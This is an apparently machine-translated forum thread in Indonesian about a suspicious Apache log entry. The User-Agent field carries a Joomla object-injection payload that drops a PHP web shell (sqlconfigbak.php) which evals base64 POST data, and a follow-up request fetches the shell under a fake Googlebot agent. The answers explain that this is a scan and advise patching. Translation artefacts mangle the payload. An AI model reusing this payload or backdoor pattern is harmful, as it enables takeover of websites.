Apakah identifikasi agen pengguna digunakan untuk beberapa teknik serangan scripting?


10

Entri log akses Apache di situs saya biasanya seperti ini:

207.46.13.174 - - [31 / Okt / 2016: 10: 18: 55 +0100] "DAPATKAN / hubungi HTTP / 1.1" 200 256 "-" "Mozilla / 5.0 (kompatibel; bingbot / 2.0; + http: // www .bing.com / bingbot.htm) "0.607 MISS 10.10.36.125:104 0.607

sehingga Anda dapat melihat bidang agen pengguna di sana. Tapi hari ini saya juga menemukan bidang agen pengguna yang digunakan seperti ini:

62.210.162.42 - - [31 / Okt / 2016: 11: 24: 19 +0100] "DAPATKAN / HTTP / 1.1" 200 399 "-" "} __ test | O: 21:" JDatabaseDriverMysqli ": 3: {s: 2 : "fc"; O: 17: "JSimplepieFactory": 0: {} s: 21: "\ 0 \ 0 \ 0disconnectHandlers"; a: 1: {i: 0; a: 2: {i: 0; O: 9: "SimplePie": 5: {s: 8: "sanitize"; O: 20: "JDatabaseDriverMysql": 0: {} s: 8: "feed_url"; s: 242: "file_put_contents ($ _ SERVER [" DOCUMENT_ROOT " ] .chr (47). "sqlconfigbak.php", "| = | \ x3C" .chr (63). "php \ x24mujj = \ x24_POST ['z']; if (\ x24mujj! = '') {\ x24xsser = base64_decode (\ x24_POST ['z0']); @ eval (\ "\\ x24safedg = \ x24xsser; \");} "); JFactory :: getConfig (); exit;"; s: 19: " cache_name_function "; s: 6:" assert "; s: 5:" cache "; b: 1; s: 11:" cache_class "; O: 20:"JDatabaseDriverMysql ": 0: {}} i: 1; s: 4:" init ";}} s: 13:" \ 0 \ 0 \ 0connection "; b: 1;} ~ Ů" 0.304 BYPASS 10.10.36.125:104 0,304

Apakah ini serangan? Entri log berikutnya tampaknya telah berhasil mengambil (kode 200) file yang sqlconfigbak.phpdisebutkan dalam skrip. Meskipun saya tidak dapat menemukan file dalam sistem file:

62.210.162.42 - - [31 / Okt / 2016: 11: 24: 20 +0100] "DAPAT //sqlconfigbak.php HTTP / 1.1" 200 399 "http://www.googlebot.com/bot.html" "Mozilla /5.0 (kompatibel; Googlebot / 2.1; + http: //www.google.com/bot.html) "0.244 BYPASS 10.10.36.125:104 0.244

Tolong apa yang terjadi di sini?

Jawaban:



4

Alamat IP yang Anda tautkan tidak menyelesaikan ke nama host Google karena itu bukan Google. Orang atau bot sedang memindai kerentanan situs Anda. Yang pertama berusaha menemukan kerentanan Joomla.

Peristiwa ini sering terjadi di sebagian besar situs web, Anda harus memastikan bahwa Anda mengikuti praktik terbaik dan mengeraskan situs web Anda, prosesnya lama dan Anda harus menemukan dan mengikuti tutorial online.


Oke terima kasih. Saya sudah mengeraskan situs webnya sebelum menemukan ini. Jujur, menemukan vektor serangan seperti itu sedikit mengejutkanku.
miroxlav

2

Selain jawaban lain, perhatikan bahwa fakta bahwa serangan ini tampaknya berhasil menunjukkan Anda menjalankan versi PHP lama yang tidak aman. Perbaikan untuk bug yang dieksploitasi serangan ini dirilis pada bulan September 2015. Jalankan proses pembaruan Anda dan pastikan itu menarik versi PHP terbaru. Dan periksa juga program-program usang lainnya yang menghadap ke Internet, karena tampaknya server Anda belum diperbarui selama setidaknya satu tahun.


Poin bagus!
closetnoc
Dengan menggunakan situs kami, Anda mengakui telah membaca dan memahami Kebijakan Cookie dan Kebijakan Privasi kami.
Licensed under cc by-sa 3.0 with attribution required.